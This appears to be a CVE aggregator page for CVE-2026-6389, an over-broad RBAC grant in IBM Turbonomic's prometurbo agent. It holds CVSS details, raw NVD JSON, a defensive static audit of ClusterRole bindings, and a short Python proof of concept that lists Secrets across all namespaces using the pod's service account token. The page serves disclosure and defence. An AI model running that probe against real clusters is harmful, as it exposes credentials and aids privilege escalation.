Security Vulnerability Report
CVE-2026-6389 CVSS 8.8 HIGH

Published: 2026-04-30 22:16:26
Last Modified: 2026-05-05 00:17:30

Description

The IBM Turbonomic prometurbo agent, versions 8.16.0 through 8.17.6, as shipped with IBM Turbonomic Application Resource Management, grants excessive cluster-wide permissions, including unrestricted read access to all Secrets in the cluster. An attacker who compromises the operator or its service account can exfiltrate the credentials held in those Secrets, escalate privileges, and potentially achieve full cluster compromise. The weakness is classified as CWE-269 (Improper Privilege Management): the agent's RBAC grant is broader than the agent needs, so anyone holding its service account token inherits that excess.

CVSS Details

CVSS Score
8.8 (Secondary assessment)
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
NVD Primary Score
7.8 HIGH, CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

The two assessments agree on every metric except Scope: the Secondary vector rates it Changed (S:C, the compromised agent affects resources outside its own security authority), the NVD Primary vector Unchanged (S:U), which accounts for the 8.8 vs 7.8 difference.

Configurations (Affected Products)

cpe:2.3:a:ibm:turbonomic_prometurbo_agent:*:*:*:*:*:*:*:* - VULNERABLE
Versions from 8.16.0 (inclusive) up to but excluding 8.18.0, i.e. 8.16.0 through 8.17.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
"""
PoC for CVE-2026-6389
Demonstrates excessive 'read' permissions on secrets due to misconfigured RBAC.
Requires running inside the vulnerable pod or having the service account token.
"""
from kubernetes import client, config


def check_secrets_access():
    try:
        # Load in-cluster configuration (the pod's mounted service account token)
        config.load_incluster_config()
        v1 = client.CoreV1Api()
        print("[*] Attempting to list secrets across all namespaces...")
        # Listing secrets in every namespace needs a cluster-wide grant
        # (a ClusterRoleBinding to a role with 'list' on secrets); a correctly
        # scoped service account gets HTTP 403 here instead.
        secrets = v1.list_secret_for_all_namespaces()
        print(f"[+] Exploit Successful! Found {len(secrets.items)} secrets accessible.")
        # Display only namespace/name of the first 5 secrets for verification;
        # the secret payloads are deliberately not printed.
        for sec in secrets.items[:5]:
            print(f"  - Name: {sec.metadata.namespace}/{sec.metadata.name}")
    except client.exceptions.ApiException as e:
        if e.status == 403:
            print("[-] Access Denied: Service account does not have sufficient permissions.")
        else:
            print(f"[-] An error occurred: {e}")
    except Exception as e:
        # load_incluster_config() raises ConfigException when run outside a pod
        print(f"[-] Configuration error: {e}")


if __name__ == "__main__":
    check_secrets_access()
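The permission pattern the PoC above probes at runtime can also be found statically, from the RBAC objects alone, without touching the API server. The following audit is an added example for this page, not code from IBM or the Turbonomic project: it walks ClusterRole and ClusterRoleBinding objects (constructed inline here as Python dicts, with illustrative role, binding, namespace and service account names that are assumptions, not the advisory's identifiers) and reports every service account bound cluster-wide to a role that can read Secrets. The over-broad role sits beside the least-privilege shape: Secrets dropped from the ClusterRole, and the one named Secret the agent needs granted through a namespaced Role instead.

```python
"""Static audit for the RBAC pattern behind CVE-2026-6389 (CWE-269): a
ClusterRole that can read Secrets, bound cluster-wide to a service account.

Added example, not IBM/Turbonomic code. Role, binding, namespace and service
account names are constructed for illustration and are NOT the advisory's
identifiers. Inputs are plain dicts in the shape `kubectl get clusterroles
-o json` / `kubectl get clusterrolebindings -o json` return under "items".
"""

READ_VERBS = {"get", "list", "watch"}


def rule_reads_secrets(rule):
    """True if one RBAC rule grants a read verb on core-group Secrets.

    Wildcards ('*') in apiGroups, resources or verbs count as matches: a
    wildcard is at least as permissive as naming 'secrets' explicitly.
    """
    groups = set(rule.get("apiGroups", []))
    resources = set(rule.get("resources", []))
    verbs = set(rule.get("verbs", []))
    in_core_group = bool(groups & {"", "*"})
    covers_secrets = bool(resources & {"secrets", "*"})
    can_read = bool(verbs & READ_VERBS) or "*" in verbs
    return in_core_group and covers_secrets and can_read


def secret_reading_cluster_roles(cluster_roles):
    """Names of ClusterRoles with at least one Secret-reading rule."""
    return {
        cr["metadata"]["name"]
        for cr in cluster_roles
        if any(rule_reads_secrets(r) for r in cr.get("rules", []))
    }


def cluster_wide_secret_readers(cluster_roles, cluster_role_bindings):
    """Map (namespace, serviceAccount) -> ClusterRole name for every service
    account that a ClusterRoleBinding ties to a Secret-reading ClusterRole.
    Only ClusterRoleBindings count: a RoleBinding to the same ClusterRole
    confines it to one namespace and is not the cluster-wide exposure here.
    """
    risky = secret_reading_cluster_roles(cluster_roles)
    findings = {}
    for crb in cluster_role_bindings:
        ref = crb["roleRef"]
        if ref["kind"] != "ClusterRole" or ref["name"] not in risky:
            continue
        for subj in crb.get("subjects", []):
            if subj.get("kind") == "ServiceAccount":
                findings[(subj["namespace"], subj["name"])] = ref["name"]
    return findings


# ---- constructed sample manifests (illustrative names, not real ones) --------

# Over-broad: an agent that needs pods/nodes is also handed every Secret.
BROAD_ROLE = {
    "kind": "ClusterRole",
    "metadata": {"name": "example-metrics-agent"},
    "rules": [{"apiGroups": [""], "resources": ["pods", "nodes", "secrets"],
               "verbs": ["get", "list", "watch"]}],
}

# Least privilege: Secrets dropped from the ClusterRole; the single credential
# the agent needs comes from a namespaced Role pinned to one resourceName,
# bound with a RoleBinding, so it never enters the cluster-wide audit.
SCOPED_ROLE = {
    "kind": "ClusterRole",
    "metadata": {"name": "example-metrics-agent-scoped"},
    "rules": [{"apiGroups": [""], "resources": ["pods", "nodes"],
               "verbs": ["get", "list", "watch"]}],
}
SCOPED_SECRET_ROLE = {
    "kind": "Role",
    "metadata": {"name": "example-metrics-agent-token", "namespace": "monitoring"},
    "rules": [{"apiGroups": [""], "resources": ["secrets"],
               "resourceNames": ["example-scrape-token"], "verbs": ["get"]}],
}

BINDINGS = [
    {"kind": "ClusterRoleBinding",
     "metadata": {"name": "example-metrics-agent"},
     "roleRef": {"kind": "ClusterRole", "name": "example-metrics-agent"},
     "subjects": [{"kind": "ServiceAccount", "name": "metrics-agent",
                   "namespace": "monitoring"}]},
    {"kind": "ClusterRoleBinding",
     "metadata": {"name": "example-metrics-agent-scoped"},
     "roleRef": {"kind": "ClusterRole", "name": "example-metrics-agent-scoped"},
     "subjects": [{"kind": "ServiceAccount", "name": "metrics-agent-scoped",
                   "namespace": "monitoring"}]},
]


def audit_sample():
    """Run the audit over the constructed manifests; only the broad role is flagged."""
    return cluster_wide_secret_readers([BROAD_ROLE, SCOPED_ROLE], BINDINGS)


if __name__ == "__main__":
    for (ns, sa), role in audit_sample().items():
        print(f"[!] {ns}/{sa} reads every Secret cluster-wide via ClusterRole {role}")
```

Against a live cluster, feed the same functions the "items" arrays of `kubectl get clusterroles -o json` and `kubectl get clusterrolebindings -o json`; `kubectl auth can-i list secrets --all-namespaces --as=system:serviceaccount:<namespace>:<serviceaccount>` then confirms a finding from the API server's own authorizer. Note that the scoped Role still reads a Secret, so a per-rule check flags it; what removes the cluster-wide exposure is the binding scope and the resourceNames pin, which is why the audit keys on ClusterRoleBindings rather than on rules alone.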

References

https://www.ibm.com/support/pages/node/7270720 (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-6389",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-30T22:16:26.207",
    "lastModified": "2026-05-05T00:17:29.920",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "IBM Turbonomic prometurbo agent 8.16.0 through 8.17.6 IBM Turbonomic Application Resource Management grants excessive cluster‑wide permissions, including unrestricted read access to all secrets. An attacker that compromises the operator or its service account can exfiltrate sensitive credentials, escalate privileges, and potentially achieve full cluster compromise."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.0,
          "impactScore": 6.0
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-269"}]
      },
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:ibm:turbonomic_prometurbo_agent:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "8.16.0",
                "versionEndExcluding": "8.18.0",
                "matchCriteriaId": "AF458961-51A0-458F-8A99-8FA8CA070AEC"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.ibm.com/support/pages/node/7270720",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}